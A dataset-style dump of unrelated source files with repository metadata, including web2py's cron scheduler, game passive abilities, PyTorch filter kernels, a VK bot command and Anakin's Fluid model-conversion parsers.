cmd = self.cmd.split()
proc = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=self.shell)
_cron_subprocs.append(proc)
(stdoutdata, stderrdata) = proc.communicate()
try:
_cron_subprocs.remove(proc)
except ValueError:
pass
if proc.returncode != 0:
logger.warning(
'WEB2PY CRON Call returned code %s:\n%s' %
(proc.returncode, stdoutdata + stderrdata))
else:
logger.debug('WEB2PY CRON Call returned success:\n%s'
% stdoutdata)
def crondance(applications_parent, ctype='soft', startup=False, apps=None):
apppath = os.path.join(applications_parent, 'applications')
cron_path = os.path.join(applications_parent)
token = Token(cron_path)
cronmaster = token.acquire(startup=startup)
if not cronmaster:
return
now_s = time.localtime()
checks = (('min', now_s.tm_min),
('hr', now_s.tm_hour),
('mon', now_s.tm_mon),
('dom', now_s.tm_mday),
('dow', (now_s.tm_wday + 1) % 7))
if apps is None:
apps = [x for x in os.listdir(apppath)
if os.path.isdir(os.path.join(apppath, x))]
full_apath_links = set()
for app in apps:
if _cron_stopping:
break
apath = os.path.join(apppath, app)
# if app is a symbolic link to other app, skip it
full_apath_link = absolute_path_link(apath)
if full_apath_link in full_apath_links:
continue
else:
full_apath_links.add(full_apath_link)
cronpath = os.path.join(apath, 'cron')
crontab = os.path.join(cronpath, 'crontab')
if not os.path.exists(crontab):
continue
try:
cronlines = fileutils.readlines_file(crontab, 'rt')
lines = [x.strip() for x in cronlines if x.strip(
) and not x.strip().startswith('#')]
tasks = [parsecronline(cline) for cline in lines]
except Exception, e:
logger.error('WEB2PY CRON: crontab read error %s' % e)
continue
for task in tasks:
if _cron_stopping:
break
if sys.executable.lower().endswith('pythonservice.exe'):
_python_exe = os.path.join(sys.exec_prefix, 'python.exe')
else:
_python_exe = sys.executable
commands = [_python_exe]
w2p_path = fileutils.abspath('web2py.py', gluon=True)
if os.path.exists(w2p_path):
commands.append(w2p_path)
if applications_parent != global_settings.gluon_parent:
commands.extend(('-f', applications_parent))
citems = [(k in task and not v in task[k]) for k, v in checks]
task_min = task.get('min', [])
if not task:
continue
elif not startup and task_min == [-1]:
continue
elif task_min != [-1] and reduce(lambda a, b: a or b, citems):
continue
logger.info('WEB2PY CRON (%s): %s executing %s in %s at %s'
% (ctype, app, task.get('cmd'),
os.getcwd(), datetime.datetime.now()))
action, command, models = False, task['cmd'], ''
if command.startswith('**'):
(action, models, command) = (True, '', command[2:])
elif command.startswith('*'):
(action, models, command) = (True, '-M', command[1:])
else:
action = False
if action and command.endswith('.py'):
commands.extend(('-J', # cron job
models, # import models?
'-S', app, # app name
'-a', '"<recycle>"', # password
'-R', command)) # command
elif action:
commands.extend(('-J', # cron job
models, # import models?
'-S', app + '/' + command, # app name
'-a', '"<recycle>"')) # password
else:
commands = command
# from python docs:
# You do not need shell=True to run a batch file or
# console-based executable.
shell = False
try:
cronlauncher(commands, shell=shell).start()
except Exception, e:
logger.warning(
'WEB2PY CRON: Execution error for %s: %s'
% (task.get('cmd'), e))
token.release()
| 34.32199
| 79
| 0.530089
|
1d03c9aee09c188288a56fb7ce9845598d7e9034
| 16
|
py
|
Python
|
SoapLibrary/version.py
|
rfabbris/Robot-Framework-SOAP-Library
|
b1c79aed3cfb63a70f301aca33de9256c0d215bb
|
[
"MIT"
] | null | null | null |
SoapLibrary/version.py
|
rfabbris/Robot-Framework-SOAP-Library
|
b1c79aed3cfb63a70f301aca33de9256c0d215bb
|
[
"MIT"
] | null | null | null |
SoapLibrary/version.py
|
rfabbris/Robot-Framework-SOAP-Library
|
b1c79aed3cfb63a70f301aca33de9256c0d215bb
|
[
"MIT"
] | null | null | null |
VERSION = "0.6"
| 8
| 15
| 0.5625
|
d45fd4235e3322c64585fb87a3ba0acdd1282ade
| 3,754
|
py
|
Python
|
passives.py
|
arthur-hav/hexrl
|
31e86e5ba3c2893c16e038fe4809e2f3cc652090
|
[
"MIT"
] | 2
|
2018-08-13T11:34:42.000Z
|
2018-08-19T05:51:29.000Z
|
passives.py
|
arthur-hav/hexrl
|
31e86e5ba3c2893c16e038fe4809e2f3cc652090
|
[
"MIT"
] | 5
|
2018-08-17T12:03:55.000Z
|
2018-08-23T12:03:09.000Z
|
passives.py
|
arthur-hav/hexrl
|
31e86e5ba3c2893c16e038fe4809e2f3cc652090
|
[
"MIT"
] | 4
|
2018-08-17T11:50:31.000Z
|
2018-09-22T08:32:58.000Z
|
class Passive:
def __init__(self, image_name, **kwargs):
self.image_name = image_name
for k, v in kwargs.items():
setattr(self, k, v)
def apply_to(self, creature):
pass
def get_short_desc(self):
pass
class RegenerationPassive(Passive):
def apply_to(self, creature):
old_tick = creature.tick
def new_tick(elapsed_time):
old_tick(elapsed_time)
if creature.health < (self.maxhealth or creature.maxhealth):
creature.health += round(elapsed_time / 100 * self.rate)
creature.tick = new_tick
old_end_game = creature.end_combat
def new_end_game():
old_end_game()
creature.health = max(creature.health, self.maxhealth or creature.maxhealth)
creature.end_combat = new_end_game
def get_short_desc(self):
t = 'Regen %d' % self.rate
if self.maxhealth:
t += ' below %d' % self.maxhealth
return t
def get_description(self):
t = 'Regenerates %d health per turn' % self.rate
if self.maxhealth:
t += ' when below %d health' % self.maxhealth
return t
class HealPassive(Passive):
def apply_to(self, creature):
old_end_combat = creature.end_combat
def new_end_combat():
for cr in creature.combat.creatures.values():
if cr.health > 0:
cr.health += self.amount
cr.health = min(cr.health, cr.maxhealth)
old_end_combat()
creature.end_combat = new_end_combat
def get_short_desc(self):
t = 'Heal %d' % self.amount
return t
def get_description(self):
t = 'Heals all party for %d health after every combat' % self.amount
return t
class ShieldPassive(Passive):
def apply_to(self, creature):
old_end_act = creature.end_act
def end_act():
old_end_act()
creature.shield = max(creature.shield, self.shield)
creature.end_act = end_act
def get_short_desc(self):
return 'Shield %d' % self.shield
def get_description(self):
return 'Every turn, gains a shield preventing %d damage' % self.shield
class Fastcast(Passive):
def apply_to(self, creature):
old_use = creature.use_ability
def use_ability(ability, target):
old_ability_instant = ability.is_instant
ability.is_instant = True
old_use(ability, target)
if old_ability_instant:
return
if creature.free_moves:
creature.free_moves -= 1
else:
creature.end_act()
ability.is_instant = old_ability_instant
creature.use_ability = use_ability
def get_short_desc(self):
return 'Fastcast'
def get_description(self):
return 'Casting abilities cost 1 movement instead of ending turn'
class Quick(Passive):
def apply_to(self, creature):
total_moves = self.bonus_moves + 1
creature.FREE_MOVES = total_moves
def get_short_desc(self):
return 'Quick %d' % self.bonus_moves
def get_description(self):
return 'Gains %d bonus moves' % self.bonus_moves
PASSIVES = {
'Regeneration': (RegenerationPassive, {'name': 'Regeneration', 'image_name':'icons/heartplus.png'}),
'Shield': (ShieldPassive, {'name': 'Shield', 'image_name':'icons/shield-icon.png'}),
'Fastcast': (Fastcast, {'name': 'Fastcast', 'image_name': 'icons/smite.png'}),
'PartyHeal': (HealPassive, {'name': 'PartyHeal', 'image_name':'icons/heart.png'}),
'Quick': (Quick, {'name': 'Quick', 'image_name':'icons/quickness.png'})
}
| 30.770492
| 108
| 0.607352
|
1f0772bcb3692ba1355a1a7392722d7b6e1152b7
| 923
|
py
|
Python
|
torchimagefilter/kernel.py
|
pmeier/torchimagefilter
|
a614c0f8167341d7b3c4bdfaefeaf9bddcf05dae
|
[
"BSD-3-Clause"
] | null | null | null |
torchimagefilter/kernel.py
|
pmeier/torchimagefilter
|
a614c0f8167341d7b3c4bdfaefeaf9bddcf05dae
|
[
"BSD-3-Clause"
] | null | null | null |
torchimagefilter/kernel.py
|
pmeier/torchimagefilter
|
a614c0f8167341d7b3c4bdfaefeaf9bddcf05dae
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import torch
__all__ = ["radius_to_size", "gauss_kernel", "box_kernel"]
def radius_to_size(radius: int) -> int:
return 2 * radius + 1
def _normalize_kernel(kernel: torch.Tensor) -> torch.Tensor:
return kernel / torch.sum(kernel)
def box_kernel(radius: int, normalize: bool = True) -> torch.Tensor:
size = radius_to_size(radius)
kernel = torch.ones((size, size))
if normalize:
kernel = _normalize_kernel(kernel)
return kernel
def gauss_kernel(std: float, radius: int, normalize: bool = True) -> torch.Tensor:
var = std ** 2.0
factor = np.sqrt(2.0 * np.pi * var)
exponent = torch.arange(-radius, radius + 1, dtype=torch.float)
exponent = -(exponent ** 2.0) / (2.0 * var)
kernel = (factor * torch.exp(exponent)).unsqueeze(1)
kernel = torch.mm(kernel, kernel.t())
if normalize:
kernel = _normalize_kernel(kernel)
return kernel
| 27.969697
| 82
| 0.660888
|
8d8d7eccce8ccf7a09e545739de81071f5b4b6ca
| 374
|
py
|
Python
|
src/commands/set_timer.py
|
PDmatrix/VkBot
|
e5619204d7740fce8ca4a40b49f7a37ba61eba39
|
[
"MIT"
] | 1
|
2018-11-15T18:51:20.000Z
|
2018-11-15T18:51:20.000Z
|
src/commands/set_timer.py
|
PDmatrix/VkBot
|
e5619204d7740fce8ca4a40b49f7a37ba61eba39
|
[
"MIT"
] | null | null | null |
src/commands/set_timer.py
|
PDmatrix/VkBot
|
e5619204d7740fce8ca4a40b49f7a37ba61eba39
|
[
"MIT"
] | 1
|
2018-09-25T21:05:07.000Z
|
2018-09-25T21:05:07.000Z
|
from src import command_system
from src import db_context
def set_timer(user_id):
db_context.set_timer_to_user(user_id)
return "Таймер установлен!"
rep_command = command_system.Command()
rep_command.keys = ['установить', 'установить таймер', 'set', 'set timer']
rep_command.description = 'Установить таймер'
rep_command.process = set_timer
rep_command.index = 4
| 24.933333
| 74
| 0.778075
|
46ed423245fdd15b66c9ba22dde6f78694074fab
| 18,637
|
py
|
Python
|
tools/external_converter_v2/parser/kill_fluid/fluid_layer_param_transmit.py
|
mengkai94/Anakin
|
9424277cf9ae180a14aff09560d3cd60a49c76d2
|
[
"Apache-2.0"
] | null | null | null |
tools/external_converter_v2/parser/kill_fluid/fluid_layer_param_transmit.py
|
mengkai94/Anakin
|
9424277cf9ae180a14aff09560d3cd60a49c76d2
|
[
"Apache-2.0"
] | 3
|
2018-06-22T09:08:44.000Z
|
2018-07-04T08:38:30.000Z
|
tools/external_converter_v2/parser/kill_fluid/fluid_layer_param_transmit.py
|
mengkai94/Anakin
|
9424277cf9ae180a14aff09560d3cd60a49c76d2
|
[
"Apache-2.0"
] | null | null | null |
from ..operations import OpsParam, OpsRegister
from ..logger import *
from ..proto import *
from fluid_helper import *
def ParserFeedDecorator(OpName):
def warpper(Parser):
def warpper_args(args):
Parser(args)
OpsRegister()[OpName].feed_node_attr(args[0])
args[2].set_name(OpName)
args[0].set_op(args[2]())
return warpper_args
return warpper
# common
def NotNeededInInference(args):
# args is tuple object
node_io = args[0]
layer = args[1]
@ParserFeedDecorator("Input")
def Parser_feed(args):
private_data = args[4]
input_shape = private_data['input_shape']
alias = private_data['alias']
OpsRegister()["Input"].input_shape = input_shape
OpsRegister()["Input"].alias = alias
@ParserFeedDecorator("Convolution")
def Parser_conv2d(args):
op = args[1]
helper = args[3]
private_data = args[4]
[weights_tensor, weights_shape] = helper.param_tensor_sh(op, 'Filter')
OpsRegister()["Convolution"].weight_1 = weights_tensor
OpsRegister()["Convolution"].filter_num = weights_shape[0]
OpsRegister()["Convolution"].kernel_size = weights_shape[-2:]
OpsRegister()["Convolution"].strides = helper.attr_data(op, 'strides')
OpsRegister()["Convolution"].padding = helper.attr_data(op, 'paddings')
OpsRegister()["Convolution"].dilation_rate = helper.attr_data(op, 'dilations')
OpsRegister()["Convolution"].group = helper.attr_data(op, 'groups')
OpsRegister()["Convolution"].axis = 1
if 'bias' in private_data.keys():
OpsRegister()["Convolution"].bias_term = True
OpsRegister()["Convolution"].weight_2 = private_data['bias']
else:
OpsRegister()["Convolution"].bias_term = False
@ParserFeedDecorator("ReLU")
def Parser_relu(args):
OpsRegister()["ReLU"].alpha = 0.0
@ParserFeedDecorator("Pooling")
def Parser_pool2d(args):
op = args[1]
helper = args[3]
OpsRegister()["Pooling"].pool_size = helper.attr_data(op, 'ksize')
OpsRegister()["Pooling"].strides = helper.attr_data(op, 'strides')
OpsRegister()["Pooling"].padding = helper.attr_data(op, 'paddings')
OpsRegister()["Pooling"].global_pooling = helper.attr_data(op, 'global_pooling')
if helper.attr_data(op, 'pooling_type') == 'max':
OpsRegister()["Pooling"].method = "MAX"
elif helper.attr_data(op, 'pooling_type') in ['average', 'avg']:
OpsRegister()["Pooling"].method = "AVG"
if helper.attr_data(op, 'ceil_mode') == False:
OpsRegister()["Pooling"].cmp_out_shape_floor_as_conv = True
else:
OpsRegister()["Pooling"].cmp_out_shape_floor_as_conv = False
@ParserFeedDecorator("Dense")
def Parser_mul(args):
op = args[1]
helper = args[3]
private_data = args[4]
weights_needs_trans = True
[weights_tensor, weights_shape] = helper.param_tensor_sh(op, 'Y', weights_needs_trans)
OpsRegister()["Dense"].weight_1 = weights_tensor
OpsRegister()["Dense"].out_dim = weights_shape[2]
OpsRegister()["Dense"].axis = helper.attr_data(op, 'x_num_col_dims')
if 'bias' in private_data.keys():
OpsRegister()["Dense"].bias_term = True
OpsRegister()["Dense"].weight_2 = private_data['bias']
else:
OpsRegister()["Dense"].bias_term = False
@ParserFeedDecorator("Softmax")
def Parser_softmax(args):
private_data = args[4]
if 'axis' in private_data.keys():
axis = private_data['axis']
else:
axis = 1
OpsRegister()["Softmax"].axis = axis
@ParserFeedDecorator("Activation")
def Parser_sigmoid(args):
OpsRegister()["Activation"].type = "Sigmoid"
@ParserFeedDecorator("Axpy")
def Parser_axpy(args):
pass
@ParserFeedDecorator("BatchNorm")
def Parser_batch_norm(args):
op = args[1]
helper = args[3]
OpsRegister()["BatchNorm"].weight_1 = helper.param_tensor(op, 'Mean')
OpsRegister()["BatchNorm"].weight_2 = helper.param_tensor(op, 'Variance')
OpsRegister()["BatchNorm"].weight_3 = helper.create_tensor([1], [1, 1, 1, 1], FLOAT)
OpsRegister()["BatchNorm"].momentum = helper.attr_data(op, 'momentum')
OpsRegister()["BatchNorm"].epsilon = helper.attr_data(op, 'epsilon')
@ParserFeedDecorator("Scale")
def Parser_scale_disc_bn(args):
op = args[1]
helper = args[3]
mean = helper.np_param(op, 'Mean')
var = helper.np_param(op, 'Variance')
alpha = helper.np_param(op, 'Scale')
beta = helper.np_param(op, 'Bias')
eps = helper.attr_data(op, 'epsilon')
var = np.sqrt(var + eps)
np_scale = alpha / var
np_bias = beta - (alpha * mean / var)
np_scale_shape = map(int, [1]*(4-len(np_scale.shape)) + list(np_scale.shape))
np_bias_shape = map(int, [1]*(4-len(np_bias.shape)) + list(np_bias.shape))
np_scale_tensor = helper.create_tensor(list(np_scale.flatten()), np_scale_shape, FLOAT)
np_bias_tensor = helper.create_tensor(list(np_bias.flatten()), np_bias_shape, FLOAT)
OpsRegister()["Scale"].bias_term = True
OpsRegister()["Scale"].weight_1 = np_scale_tensor
OpsRegister()["Scale"].weight_2 = np_bias_tensor
OpsRegister()["Scale"].axis = 1
OpsRegister()["Scale"].num_axes = 1
@ParserFeedDecorator("Scale")
def Parser_scale_of_bn(args):
op = args[1]
helper = args[3]
OpsRegister()["Scale"].weight_1 = helper.param_tensor(op, 'Scale')
OpsRegister()["Scale"].axis = 1
OpsRegister()["Scale"].num_axes = 1
has_bias = helper.is_persistable_param(op, 'Bias')
if has_bias is True:
OpsRegister()["Scale"].bias_term = True
OpsRegister()["Scale"].weight_2 = helper.param_tensor(op, 'Bias')
else:
OpsRegister()["Scale"].bias_term = False
@ParserFeedDecorator("Split")
def Parser_split(args):
private_data = args[4]
split_num = private_data['split_num']
OpsRegister()["Split"].split_num = split_num
@ParserFeedDecorator("Reshape") # NMT
def Parser_reshape(args):
op = args[1]
helper = args[3]
private_data = args[4]
if 'new_shape' in private_data.keys():
shape = private_data['new_shape']
else:
shape = helper.attr_data(op, 'shape')
shape = map(int, shape + [1] * (4 - len(shape)))
OpsRegister()["Reshape"].dims = shape
@ParserFeedDecorator("Concat")
def Parser_concat(args):
op = args[1]
helper = args[3]
OpsRegister()["Concat"].axis = helper.attr_data(op, 'axis')
@ParserFeedDecorator("Concat")
def Parser_concat_btw_priorbox_boxcoder(args):
op = args[1]
helper = args[3]
OpsRegister()["Concat"].axis = 3
@ParserFeedDecorator("Permute")
def Parser_transpose(args):
op = args[1]
helper = args[3]
fluid_dims = helper.attr_data(op, 'axis')
n = 4 - len(fluid_dims)
dims = range(0, n)
tail_dims = [i + n for i in fluid_dims]
dims.extend(tail_dims)
OpsRegister()["Permute"].dims = dims
########## SSD Model ##########
@ParserFeedDecorator("PriorBox")
def Parser_prior_box(args):
op = args[1]
helper = args[3]
OpsRegister()["PriorBox"].min_size = helper.attr_data(op, 'min_sizes')
OpsRegister()["PriorBox"].max_size = helper.attr_data(op, 'max_sizes')
OpsRegister()["PriorBox"].aspect_ratio = helper.attr_data(op, 'aspect_ratios')
OpsRegister()["PriorBox"].is_flip = helper.attr_data(op, 'flip')
OpsRegister()["PriorBox"].is_clip = helper.attr_data(op, 'clip')
OpsRegister()["PriorBox"].variance = helper.attr_data(op, 'variances')
OpsRegister()["PriorBox"].img_h = 0
OpsRegister()["PriorBox"].img_w = 0
OpsRegister()["PriorBox"].step_h = helper.attr_data(op, 'step_h')
OpsRegister()["PriorBox"].step_w = helper.attr_data(op, 'step_w')
OpsRegister()["PriorBox"].offset = helper.attr_data(op, 'offset')
OpsRegister()["PriorBox"].order = ['MIN', 'COM', 'MAX']
@ParserFeedDecorator("box_coder")
def Parser_box_coder(args):
pass
@ParserFeedDecorator("DetectionOutput")
def Parser_multiclass_nms(args):
op = args[1]
helper = args[3]
private_data = args[4]
OpsRegister()["DetectionOutput"].share_location = True
OpsRegister()["DetectionOutput"].variance_encode_in_target = False
OpsRegister()["DetectionOutput"].class_num = 0
OpsRegister()["DetectionOutput"].background_id = helper.attr_data(op, 'background_label')
OpsRegister()["DetectionOutput"].keep_top_k = helper.attr_data(op, 'keep_top_k')
OpsRegister()["DetectionOutput"].conf_thresh = helper.attr_data(op, 'score_threshold')
OpsRegister()["DetectionOutput"].nms_top_k = helper.attr_data(op, 'nms_top_k')
OpsRegister()["DetectionOutput"].nms_thresh = helper.attr_data(op, 'nms_threshold')
OpsRegister()["DetectionOutput"].nms_eta = helper.attr_data(op, 'nms_eta')
if 'code_type' in private_data.keys():
if private_data['code_type'] == 'decode_center_size':
OpsRegister()["DetectionOutput"].code_type = "CENTER_SIZE"
else:
OpsRegister()["DetectionOutput"].code_type = "CORNER"
########## VIS Model ##########
@ParserFeedDecorator("Im2Sequence")
def Parser_im2sequence(args):
op = args[1]
helper = args[3]
OpsRegister()["Im2Sequence"].paddings = helper.attr_data(op, 'paddings')
OpsRegister()["Im2Sequence"].strides = helper.attr_data(op, 'strides')
OpsRegister()["Im2Sequence"].window_size = helper.attr_data(op, 'kernels')
OpsRegister()["Im2Sequence"].dilations = helper.attr_data(op, 'dilations', [1, 1])
@ParserFeedDecorator("Cast")
def Parser_cast(args):
op = args[1]
helper = args[3]
OpsRegister()["Cast"].in_type = helper.attr_data(op, 'in_dtype')
OpsRegister()["Cast"].out_type = helper.attr_data(op, 'out_dtype')
@ParserFeedDecorator("Argmax") # new256
def Parser_top_k(args):
op = args[1]
helper = args[3]
OpsRegister()["Argmax"].out_max_val = True
OpsRegister()["Argmax"].top_k = helper.attr_data(op, 'k')
OpsRegister()["Argmax"].axis_term = False
@ParserFeedDecorator("CtcAlign")
def Parser_ctc_align(args):
op = args[1]
helper = args[3]
OpsRegister()["CtcAlign"].merge_repeated = helper.attr_data(op, 'merge_repeated')
OpsRegister()["CtcAlign"].blank = helper.attr_data(op, 'blank')
@ParserFeedDecorator("Eltwise")
def Parser_sum(args):
OpsRegister()["Eltwise"].type = "Add"
OpsRegister()["Eltwise"].coeff = [1.0, 1.0]
@ParserFeedDecorator("LRN")
def Parser_lrn(args):
op = args[1]
helper = args[3]
OpsRegister()["LRN"].local_size = helper.attr_data(op, 'n')
OpsRegister()["LRN"].alpha = helper.attr_data(op, 'alpha')
OpsRegister()["LRN"].beta = helper.attr_data(op, 'beta')
OpsRegister()["LRN"].norm_region = "ACROSS_CHANNELS"
OpsRegister()["LRN"].k = helper.attr_data(op, 'k')
@ParserFeedDecorator("Gru")
def Parser_gru(args):
op = args[1]
helper = args[3]
private_data = args[4]
OpsRegister()["Gru"].is_reverse = helper.attr_data(op, 'is_reverse')
OpsRegister()["Gru"].gate_activation = helper.attr_data(op, 'gate_activation') + '_fluid'
OpsRegister()["Gru"].activation = helper.attr_data(op, 'activation') + '_fluid'
OpsRegister()["Gru"].gru_formula = "gru_origin"
if bool(private_data) is True:
ori_bx = private_data['np_bias_x']
ori_bh = helper.np_param(op, 'Bias')
ori_b = ori_bx + ori_bh
ori_wx = private_data['np_weight_x']
ori_wh = helper.np_param(op, 'Weight')
new_tensors = helper.gru_tensor_convert(ori_wh, ori_wx, ori_b)
weights = []
for tensor in new_tensors:
weights.append(helper.create_tensor(list(tensor.flatten()), list(np.shape(tensor)), FLOAT))
OpsRegister()["Gru"].weight_1 = weights[0]
OpsRegister()["Gru"].weight_2 = weights[1]
else:
OpsRegister()["Gru"].weight_1 = helper.param_tensor(op, 'Weight')
OpsRegister()["Gru"].weight_2 = helper.create_tensor([0], [-1], FLOAT)
@ParserFeedDecorator("LSTM")
def Parser_lstm(args):
op = args[1]
helper = args[3]
private_data = args[4]
OpsRegister()["LSTM"].candidate_activation = helper.attr_data(op, 'candidate_activation')
OpsRegister()["LSTM"].cell_activation = helper.attr_data(op, 'cell_activation')
OpsRegister()["LSTM"].gate_activation = helper.attr_data(op, 'gate_activation')
OpsRegister()["LSTM"].is_reverse = helper.attr_data(op, 'is_reverse')
OpsRegister()["LSTM"].use_peepholes = helper.attr_data(op, 'use_peepholes')
OpsRegister()["LSTM"].num_direction = 1
OpsRegister()["LSTM"].dropout_param = 1.0
OpsRegister()["LSTM"].num_layers = 1
OpsRegister()["LSTM"].input_activation = "null"
if bool(private_data) is True:
np_fc_bias = private_data['np_flat_fc_bias']
np_fc_weight = private_data['np_flat_fc_weight']
np_fc_outdim = private_data['np_fc_outdim']
np_lstm_bias = helper.np_param(op, 'Bias')
np_lstm_weight = helper.np_param(op, 'Weight')
np_tensors = helper.lstm_fc_tensor_merge_convert(np_fc_outdim, np_lstm_weight, \
np_lstm_bias, np_fc_weight, np_fc_bias)
np_weight = np_tensors[0]
np_bias = np_tensors[1]
np_weight_shape = map(int, [1]*(4-len(np_weight.shape)) + list(np_weight.shape))
np_bias_shape = map(int, [1]*(4-len(np_bias.shape)) + list(np_bias.shape))
np_weight_tensor = helper.create_tensor(list(np_weight.flatten()), np_weight_shape, FLOAT)
np_bias_tensor = helper.create_tensor(list(np_bias.flatten()), np_bias_shape, FLOAT)
OpsRegister()["LSTM"].weight_1 = np_weight_tensor
OpsRegister()["LSTM"].weight_2 = np_bias_tensor
else:
OpsRegister()["LSTM"].weight_1 = helper.param_tensor(op, 'Weight')
OpsRegister()["LSTM"].weight_2 = helper.create_tensor([0], [-1], FLOAT)
############### RNN ###############
@ParserFeedDecorator("Embedding")
def Parser_lookup_table(args):
op = args[1]
helper = args[3]
[weights_tensor, weights_shape] = helper.param_tensor_sh(op, 'W')
OpsRegister()["Embedding"].weight_1 = weights_tensor
OpsRegister()["Embedding"].padding_idx = helper.attr_data(op, 'padding_idx')
OpsRegister()["Embedding"].word_num = weights_shape[2]
OpsRegister()["Embedding"].emb_dim = weights_shape[3]
@ParserFeedDecorator("SequencePool")
def Parser_sequence_pool(args):
op = args[1]
helper = args[3]
OpsRegister()["SequencePool"].pooltype = helper.attr_data(op, 'pooltype')
@ParserFeedDecorator("Activation")
def Parser_tanh(args):
OpsRegister()["Activation"].type = "TanH"
@ParserFeedDecorator("SequenceConv")
def Parser_sequence_conv(args):
op = args[1]
helper = args[3]
private_data = args[4]
[weights_tensor, weights_shape] = helper.param_tensor_sh(op, 'Filter')
OpsRegister()["SequenceConv"].weight_1 = weights_tensor
OpsRegister()["SequenceConv"].filter_num = weights_shape[0]
OpsRegister()["SequenceConv"].kernel_size = weights_shape[-2:]
OpsRegister()["SequenceConv"].padding_trainable = helper.attr_data(op, 'paddingTrainable')
OpsRegister()["SequenceConv"].context_stride = helper.attr_data(op, 'contextStride')
OpsRegister()["SequenceConv"].context_start = helper.attr_data(op, 'contextStart')
OpsRegister()["SequenceConv"].context_length = helper.attr_data(op, 'contextLength')
if 'bias' in private_data.keys():
OpsRegister()["SequenceConv"].bias_term = True
OpsRegister()["SequenceConv"].weight_2 = private_data['bias']
else:
OpsRegister()["SequenceConv"].bias_term = False
@ParserFeedDecorator("CrfDecoding")
def Parser_crf_decoding(args):
op = args[1]
helper = args[3]
[weights_tensor, weights_shape] = helper.param_tensor_sh(op, 'Transition')
OpsRegister()["CrfDecoding"].weight_1 = weights_tensor
@ParserFeedDecorator("MatMul")
def Parser_matmul(args):
op = args[1]
helper = args[3]
private_data = args[4]
if 'coeff' in private_data.keys():
coeff = private_data['coeff']
else:
coeff = 1.0
OpsRegister()["MatMul"].transpose_x = helper.attr_data(op, 'transpose_X')
OpsRegister()["MatMul"].transpose_y = helper.attr_data(op, 'transpose_Y')
OpsRegister()["MatMul"].coeff = coeff
@ParserFeedDecorator("Scale")
def Parser_scale(args):
op = args[1]
helper = args[3]
scale_val = helper.attr_data(op, 'scale')
OpsRegister()["Scale"].axis = 0
OpsRegister()["Scale"].num_axes = 0
OpsRegister()["Scale"].bias_term = False
OpsRegister()["Scale"].weight_1 = helper.create_tensor([scale_val], [1, 1, 1, 1], FLOAT)
@ParserFeedDecorator("LayerNorm")
def Parser_layer_norm(args):
op = args[1]
helper = args[3]
OpsRegister()["LayerNorm"].weight_1 = helper.param_tensor(op, 'Scale')
OpsRegister()["LayerNorm"].weight_2 = helper.param_tensor(op, 'Bias')
OpsRegister()["LayerNorm"].begin_norm_axis = helper.attr_data(op, 'begin_norm_axis')
OpsRegister()["LayerNorm"].eps = helper.attr_data(op, 'epsilon')
@ParserFeedDecorator("Scale")
def Parser_dropout(args):
op = args[1]
helper = args[3]
scale_val = 1 - helper.attr_data(op, 'dropout_prob')
OpsRegister()["Scale"].axis = 0
OpsRegister()["Scale"].num_axes = 0
OpsRegister()["Scale"].bias_term = False
OpsRegister()["Scale"].weight_1 = helper.create_tensor([scale_val], [1, 1, 1, 1], FLOAT)
@ParserFeedDecorator("Scale")
def Parser_elementwise_mul(args):
op = args[1]
helper = args[3]
private_data = args[4]
OpsRegister()["Scale"].weight_1 = helper.param_tensor(op, 'Y')
OpsRegister()["Scale"].axis = helper.attr_data(op, 'axis')
OpsRegister()["Scale"].num_axes = 1
if 'bias' in private_data.keys():
OpsRegister()["Scale"].bias_term = True
OpsRegister()["Scale"].weight_2 = private_data['bias']
else:
OpsRegister()["Scale"].bias_term = False
FLUID_NODE_FILLER = {
"feed":OpsParam().set_parser(Parser_feed),
"conv2d":OpsParam().set_parser(Parser_conv2d),
"elementwise_add":OpsParam().set_parser(Parser_sum),
"relu":OpsParam().set_parser(Parser_relu),
"pool2d":OpsParam().set_parser(Parser_pool2d),
"mul":OpsParam().set_parser(Parser_mul),
"softmax":OpsParam().set_parser(Parser_softmax),
"sigmoid":OpsParam().set_parser(Parser_sigmoid),
"axpy":OpsParam().set_parser(Parser_axpy),
"batch_norm":OpsParam().set_parser(Parser_batch_norm),
"disc_bn":OpsParam().set_parser(Parser_scale_disc_bn),
"scale_of_bn":OpsParam().set_parser(Parser_scale_of_bn),
"elementwise_mul":OpsParam().set_parser(Parser_elementwise_mul),
"split":OpsParam().set_parser(Parser_split),
"depthwise_conv2d":OpsParam().set_parser(Parser_conv2d),
"reshape":OpsParam().set_parser(Parser_reshape),
"concat":OpsParam().set_parser(Parser_concat),
"transpose":OpsParam().set_parser(Parser_transpose),
"prior_box":OpsParam().set_parser(Parser_prior_box),
"box_coder":OpsParam().set_parser(Parser_box_coder),
"multiclass_nms":OpsParam().set_parser(Parser_multiclass_nms),
"concat_btw_priorbox_boxcoder":OpsParam().set_parser(Parser_concat_btw_priorbox_boxcoder),
"im2sequence":OpsParam().set_parser(Parser_im2sequence),
"gru":OpsParam().set_parser(Parser_gru),
"sum":OpsParam().set_parser(Parser_sum),
"lrn":OpsParam().set_parser(Parser_lrn),
"top_k":OpsParam().set_parser(Parser_top_k),
"ctc_align":OpsParam().set_parser(Parser_ctc_align),
"cast":OpsParam().set_parser(Parser_cast),
"lookup_table":OpsParam().set_parser(Parser_lookup_table),
"sequence_pool":OpsParam().set_parser(Parser_sequence_pool),
"tanh":OpsParam().set_parser(Parser_tanh),
"sequence_conv":OpsParam().set_parser(Parser_sequence_conv),
"crf_decoding":OpsParam().set_parser(Parser_crf_decoding),
"lstm":OpsParam().set_parser(Parser_lstm),
"matmul":OpsParam().set_parser(Parser_matmul),
"layer_norm":OpsParam().set_parser(Parser_layer_norm),
"dropout":OpsParam().set_parser(Parser_dropout),
"scale":OpsParam().set_parser(Parser_scale),
}
| 37.95723
| 94
| 0.729302
|
5973917957b294f7a2b5ddd0a791cc8b4c57c1d1
| 291
|
py
|
Python
|
lang/py/pylib/code/textwrap/textwrap_dedent.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | 13
|
2020-01-04T07:37:38.000Z
|
2021-08-31T05:19:58.000Z
|
lang/py/pylib/code/textwrap/textwrap_dedent.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | 3
|
2020-06-05T22:42:53.000Z
|
2020-08-24T07:18:54.000Z
|
lang/py/pylib/code/textwrap/textwrap_dedent.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | 9
|
2020-10-19T04:53:06.000Z
